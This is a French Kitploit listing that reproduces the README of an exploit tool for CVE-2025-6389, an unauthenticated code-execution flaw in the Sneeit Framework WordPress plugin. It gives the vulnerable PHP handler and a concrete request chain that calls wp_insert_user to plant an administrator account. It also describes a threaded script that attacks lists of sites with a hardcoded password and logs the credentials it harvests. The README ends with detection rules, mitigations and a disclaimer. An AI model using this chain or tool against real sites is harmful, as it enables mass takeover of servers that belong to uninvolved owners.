Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-6389 — Sneeit Framework <= 8.3 - Exécution de code à distance non authentifiée dans sneeit_articles_pagination_callback | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-6389
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubnxploited/cve-2025-6389

CVE-2025-6389

Sneeit Framework <= 8.3 - Exécution de code à distance non authentifiée dans sneeit_articles_pagination_callback

Voir le dépôt
1il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-6389

Sneeit Framework <= 8.3 - Exécution de code à distance non authentifiée dans sneeit_articles_pagination_callback

root@kitploit:~
    _______      ________    ___   ___ ___  _____         __ ____   ___   ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|       / /|___ \ / _ \ / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ / /_  __) | (_) | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| '_ \|__ < > _ < \__, |
 | |____   \  /  | |____    / /_| |_| / /_ ___) |     | (_) |__) | (_) |  / / 
  \_____|   \/   |______|  |____|\___|/____|____/       \___/____/ \___/  /_/  

Telegram CVE CVSS Python

License

📡 Ne manquez pas la prochaine fuite. Suivez @KNxploited sur Telegram — la chaîne incontournable pour les CVE fraîchement divulguées, les exploits fonctionnels et la recherche en sécurité d'élite. Les premiers informés. Les premiers à agir.


🧠 Présentation

CVE-2025-6389 est une vulnérabilité d'exécution de code à distance CVSS 9.8 Critique présente dans le plugin Sneeit Framework pour WordPress.

Le défaut se trouve dans la fonction sneeit_articles_pagination_callback(), qui transmet aveuglément les entrées fournies par l'utilisateur dans call_user_func() de PHP — un attaquant non authentifié peut appeler n'importe quelle fonction PHP avec des arguments arbitraires, y compris wp_insert_user, s'octroyant ainsi un accès administrateur complet ou exécutant tout code côté serveur.

ChampDétails
ID CVECVE-2025-6389
PluginSneeit Framework (sneeit-framework)
Versions affectéesToutes les versions jusqu'à et y compris 8.3
Type de vulnérabilitéExécution de code à distance (RCE)
Vecteur d'attaqueRéseau — Aucune authentification requise
Score CVSS 3.19.8 CRITIQUE
Vecteur CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpactCompromission totale du serveur / prise de contrôle admin
ChercheurNxploited

💀 Analyse approfondie de la vulnérabilité

La cause racine est le mauvais usage de call_user_func() de PHP dans le gestionnaire AJAX du plugin :

root@kitploit:~
// Enregistré sans vérification d'authentification
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');

function sneeit_articles_pagination_callback() {
    $callback = $_POST['callback'];  // ← Nom de fonction contrôlé par l'utilisateur
    $args     = json_decode(stripslashes($_POST['args']), true); // ← Arguments contrôlés par l'utilisateur

    // Appelle TOUTE fonction PHP avec TOUS arguments — aucune validation
    $result = call_user_func($callback, ...$args);

    echo $result;
    die();
}

Pourquoi c'est critique :

  • wp_ajax_nopriv_* = accessible par n'importe qui, sans connexion requise
  • call_user_func($callback, $args) = invocation de fonction arbitraire
  • L'attaquant peut appeler var_dump, system, wp_insert_user, eval, ou toute fonction PHP/WordPress
  • La réponse est renvoyée directement — permettant une RCE aveugle et détaillée

⚔️ Chaîne d'exploitation

root@kitploit:~
Étape 1 — Sonde / Empreinte
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = var_dump
  args     = ["test"]

Réponse attendue → array(1) { [0]=> string(4) "test" }
  ↓
Confirme : call_user_func() est accessible et reflète la sortie

──────────────────────────────────────────────────────────────────
Étape 2 — Création d'un compte administrateur
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = wp_insert_user
  args     = {"user_login":"Nxploited_XXXX",
               "user_pass":"xplpass",
               "user_email":"...",
               "role":"administrator"}

Résultat → Un nouveau compte administrateur est discrètement créé sur la cible
  ↓
Accès complet au panneau d'administration WordPress obtenu ✔️

⚙️ Prérequis

root@kitploit:~
pip install requests rich
DépendanceObjectif
requestsRequêtes HTTP avec support session/proxy
richTableau de bord terminal en direct, panneaux, progression
threadingTraitement multi-cibles concurrent
queueDistribution thread-safe des cibles

Python 3.8+ requis. Les indications de type utilisent la syntaxe tuple[...] introduite dans 3.9+ — utilisez 3.9+ pour une meilleure compatibilité.


📂 Structure des fichiers

root@kitploit:~
CVE-2025-6389/
├── CVE-2025-6389.py          # Script d'exploit principal
├── list.txt                  # URLs cibles — une par ligne
├── success_results.txt       # Généré automatiquement : cibles réussies + identifiants
└── debug_responses/          # Généré automatiquement : réponses brutes du serveur pour débogage
    └── <cible>.resp.txt

🚀 Utilisation

Étape 1 — Préparer les cibles

Créez list.txt avec une URL par ligne :

root@kitploit:~
https://cible1.com
https://cible2.com
http://cible3.com

Les URLs sans http:// ou https:// sont automatiquement préfixées par http://.


Étape 2 — Lancer l'exploit

root@kitploit:~
python CVE-2025-6389.py

Vous serez invité :

root@kitploit:~
Nom du fichier cible (par défaut list.txt): list.txt
Nombre de threads (par défaut 10):       20

Étape 3 — Tableau de bord en direct

Le script lance un tableau de bord Rich en temps réel montrant :

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────┐
│  [BANNIÈRE ASCII]                                                    │
├──────────────────────────────┬──────────────────────────────────────┤
│  Info                        │  Statistiques                         │
│  Utilisation : Mettez...    │  Total des cibles : 150                 │
│  Threads : 20                │  Traité :       87                    │
│  Mot de passe : xplpass      │  Succès :       12                    │
│  Journal des succès :...    │  Échecs :       75                    │
│  Répertoire de débogage :...│  Temps écoulé :  00:01:43            │
├──────────────────────────────┴──────────────────────────────────────┤
│  Résultats récents                                                   │
│  Temps    Cible                              Résultat                 │
│  14:23:01 https://victime.com                 SUCCÈS                │
│  14:23:03 https://exemple.net                 ÉCHEC                 │
└─────────────────────────────────────────────────────────────────────┘

Étape 4 — Examiner les résultats

Les exploits réussis sont enregistrés dans success_results.txt :

root@kitploit:~
https://victime.com | UTILISATEUR : Nxploited_4821 | MOT DE PASSE : xplpass | EMAIL : [email protected]

Les réponses de débogage (pour les cibles échouées) sont enregistrées sous debug_responses/ :

root@kitploit:~
debug_responses/
└── https___victime.com.resp.txt   ← Réponse brute du serveur pour analyse

🖥️ Référence des paramètres du script

InvitePar défautDescription
Fichier ciblelist.txtFichier contenant les URLs cibles
Nombre de threads10 (max : 200)Travailleurs concurrents — augmenter pour les scans groupés
Mot de passexplpass (codé en dur)Mot de passe défini pour les comptes administrateurs créés
Format du nom d'utilisateurNxploited_XXXXGénéré automatiquement avec un suffixe aléatoire de 4 chiffres

📊 Signature de détection

L'exploit génère la signature réseau suivante — utile pour les défenseurs et les auteurs de règles WAF :

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=sneeit_articles_pagination&callback=<FONCTION>&args=<JSON>

Règle WAF / IDS (pseudo-code) :

root@kitploit:~
SI requête.méthode == POST
ET requête.chemin  == "/wp-admin/admin-ajax.php"
ET corps.requête CONTIENT "sneeit_articles_pagination"
ET corps.requête CONTIENT "callback"
ALORS BLOQUER + ALERTER

🛡️ Atténuation et correction

Si vous êtes un propriétaire de site, développeur ou défenseur, prenez ces mesures immédiatement :

  • ✅ Mettez à jour Sneeit Framework vers une version supérieure à 8.3 si un correctif est disponible
  • ✅ Désactivez et supprimez le plugin jusqu'à confirmation d'une version corrigée
  • ✅ Auditez les comptes administrateurs WordPress récemment créés pour toute entrée non autorisée
  • ✅ Implémentez la validation des entrées côté serveur — ne passez jamais les entrées utilisateur dans call_user_func()
  • ✅ Bloquez les requêtes POST non authentifiées vers admin-ajax.php au niveau du WAF/Pare-feu
  • ✅ Surveillez les journaux du serveur pour les appels à l'action AJAX sneeit_articles_pagination
  • ✅ Activez l'authentification à deux facteurs sur tous les comptes administrateurs existants comme mesure de confinement

⚠️ Clause de non-responsabilité

root@kitploit:~
CET OUTIL EST FOURNI STRICTEMENT À DES FINS ÉDUCATIVES, DE TEST DE
PÉNÉTRATION AUTORISÉ ET DE RECHERCHE EN SÉCURITÉ UNIQUEMENT.

En téléchargeant, exécutant ou modifiant ce script, vous acceptez explicitement :

  • Vous avez l'autorisation EXPLICITE et ÉCRITE du propriétaire de chaque
    système que vous testez. Aucune exception.

  • Vous opérez dans un environnement de laboratoire contrôlé ou dans le cadre
    d'un engagement formellement défini et autorisé.

  • Vous NE DÉPLOIEREZ PAS cet outil contre un système, réseau ou
    infrastructure que vous n'avez pas l'autorisation légale de tester.

  • Nxploited et tous les contributeurs n'assument AUCUNE responsabilité pour
    toute utilisation non autorisée, dommage, perte de données, action en justice
    ou poursuite pénale découlant de l'utilisation de cet outil.

L'utilisation non autorisée de cet exploit est une infraction pénale en vertu de :
  — Computer Fraud and Abuse Act (CFAA), États-Unis
  — Computer Misuse Act (CMA), Royaume-Uni
  — Directive européenne 2013/40/UE sur les attaques contre les systèmes d'information
  — Et toutes les lois nationales et internationales équivalentes en matière de cybercriminalité.

UTILISEZ DE MANIÈRE RESPONSABLE. PIRATEZ ÉTHIQUEMENT. DIVULGUEZ DE MANIÈRE RESPONSABLE.

👤 Auteur

PseudoNxploited (Khaled Alenazi)
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Suivez @KNxploited sur Telegram La chaîne où les vrais exploits sortent en premier — CVEs, zero-days, PoCs, et recherches approfondies sur les vulnérabilités. Mis à jour régulièrement. Restez affûté.


Conçu avec précision par Nxploited · Pour une recherche en sécurité autorisée uniquement · CVSS 9.8 Critique
Télécharger l’outil